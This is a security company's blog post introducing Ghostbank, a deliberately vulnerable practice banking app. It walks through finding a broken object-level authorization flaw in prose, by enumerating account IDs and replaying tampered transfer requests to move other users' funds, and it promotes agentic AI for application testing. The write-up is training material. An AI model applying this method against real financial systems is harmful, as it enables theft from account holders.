Blog

Super-powered Application Discovery and Security Testing with Agentic AI - Part 1

0 Mins Read

·

Monday, February 24, 2025

Brad Geesaman

Principal Security Engineer

Super-powered Application Discovery and Security Testing with Agentic AI - Part 1

Ghost's co-founder and CEO Greg Martin wrote in his recent blog post on the power of Agentic AI as applied to Application Security about the dual-use nature of Agentic-AI being a "super-power" for both attackers and defenders. Considering that most folks have interacted with Large Language Models (LLMs) and have experienced their benefits and drawbacks, it may seem like a very bold claim. Let's put this assertion to the test on a practical Application Security use case: comparing the workflows for finding and validating a logic flaw in a running web application.

This is the first post in a three part series where we introduce Ghostbank and find/validate a BOLA flaw using Reaper. In Part 2, we'll showcase ReaperBot, an Agentic AI framework to autonomously find/validate that same BOLA flaw. Finally, in Part 3, we'll discuss best practices and some of the remaining challenges for implementing Agentic AI in production.

Ghostbank

Created by our co-founder and CTO, Josh Larsen, for a fun challenge at one of our off-site team events, ghostbank.net is a fictional banking application.  Everyone starts with $500 Ghost Bucks, with the goal of “earning” more by “interacting” with other customers:

The application makes several API calls, such as listing account balances and recent transactions, but its key function is transferring funds between accounts. The catch is, it doesn't validate the account_from parameter when you transfer funds.  If you can enumerate valid account IDs from other accounts that have funds, you have the ability to siphon funds from their accounts into your own by tampering and replaying requests to transfer funds with other customer account IDs as the source.

For a full walkthrough in complete detail, check out "How to Hack Ghostbank" in the Reaper docs. It covers everything from installation and setup of Reaper and a step-by-step guide to solving the challenge that security folks of all skill levels should be able to follow.

If you do solve the challenge and steal some Ghost Bucks, be sure to follow the instructions on the bell at the top of the page to get a very snazzy Reaper T-shirt.

The Challenges with this Challenge

Instead of walking through the entire solution here, I want to showcase the challenges with each of the workflow steps associated with discovering and validating this flaw:

Step 1: Reconnaissance

In this challenge, you are provided with the URL and an ability to get valid credentials via the sign-up functionality.  As a logged in user with $500 to start, it's up to you to interact with the app to understand what the app does and what actions are common and expected.  Most folks have used an online banking application before, so the ability to transfer funds is expected.  Being the only source of input on the page is a great giveaway that this API endpoint is the likely target, too.

But, what if:

  • This was an app that had thousands of APIs and features that used them? Interacting with each one, capturing each action with an intercepting proxy, and then reasoning about them manually is incredibly difficult and time consuming.

  • The app wasn't providing common functionality but instead was very specialized to an industry the tester isn't familiar with? The context clues being obscured makes it much more difficult for a tester to understand what's expected and unexpected.

Without this being a very simple application with easily understood functionality, this flaw would exist as a tiny needle inside a very large haystack.

Step 2: Targeting

After successfully transferring funds between your accounts, an experienced web application penetration tester would observe a POST request containing three parameters:

  • account_from: an integer that appears to be between 100 and 1000

  • account_to an integer that appears to be between 100 and 1000

  • amount an integer that corresponds to the amount of the transfer.

From there, that experience and nuanced understanding of the variants of Broken Object Level Authorization (BOLA) would lead them to the following conclusions:

  1. This is a multi-user system, so it's likely that other accounts exist with funds in them.

  2. Based on the values for account_from and account_to, those account IDs are in a similar range.

  3. That they should try transfers with different values for one or both of those parameters to enumerate valid accounts and to see if the system allows or blocks a transfer from an account that isn't yours.

But, what if:

  • Instead of one obvious request to focus on, there were thousands of interactions to choose from?

  • This target wasn't as straightforward and the tester wasn't fully versed in the intricacies of BOLA attacks?

The reality is, the ability to analyze large volumes of potential targets for likely candidates and produce a valid attack payload is a challenge for even the best security testers at scale.

Step 3: Exploitation/Validation

The simplest exploit approach for this flaw is to capture a valid transfer, modify either the account_from or the account_to parameter with a different value, observe the behavior change, and iterate to the next value. If at least one tampered transfer request succeeds from an ID value that isn't ours and the money shows up in the account_to account, then we know for certain that the flaw is a true positive.

But, what if:

  • The IDs were highly random, large integers or infeasibly unguessable such as UUIDs?

  • There were other constraints and controls such as request rate limits?

With so many factors involved, the cognitive load of keeping this all in context and adapting to the target environment is in a word, exhausting.

Agentic AI's Super-power

So what makes Agentic AI become a "Super-power" for security teams? It's not that it's "perfect" or better than the best expert human on a single task in isolation. To me, it's when it provides outsized leverage when performing a large number of tasks in much shorter timeframes for less cost.  The modern AI age is bringing about a rapid increase in the amount of code being developed and deployed. Outnumbered Application Security teams need these kinds of leverage to stay on top of their deployed footprint.

Click here for Part 2 of this series where we tackle the challenges of the Ghostbank challenge with a team of orchestrated AI Agents working together with tools that interface directly with Reaper. In the meantime, give Ghostbank a shot.

Step Into The Underworld Of
Autonomous AppSec

Step Into The Underworld Of
Autonomous AppSec

Step Into The Underworld Of
Autonomous AppSec

Ghost Security provides autonomous app security with Agentic AI, enabling teams to discover, test, and mitigate risks in real time across complex digital environments.

Join our E-mail list

Join the Ghost Security email list—where we haunt vulnerabilities and banish breaches!

© 2024 Ghost Security. All rights reserved

Ghost Security provides autonomous app security with Agentic AI, enabling teams to discover, test, and mitigate risks in real time across complex digital environments.

Join our E-mail list

Join the Ghost Security email list—where we haunt vulnerabilities and banish breaches!

© 2024 Ghost Security. All rights reserved

Ghost Security provides autonomous app security with Agentic AI, enabling teams to discover, test, and mitigate risks in real time across complex digital environments.

Join our E-mail list

Join the Ghost Security email list—where we haunt vulnerabilities and banish breaches!

© 2024 Ghost Security. All rights reserved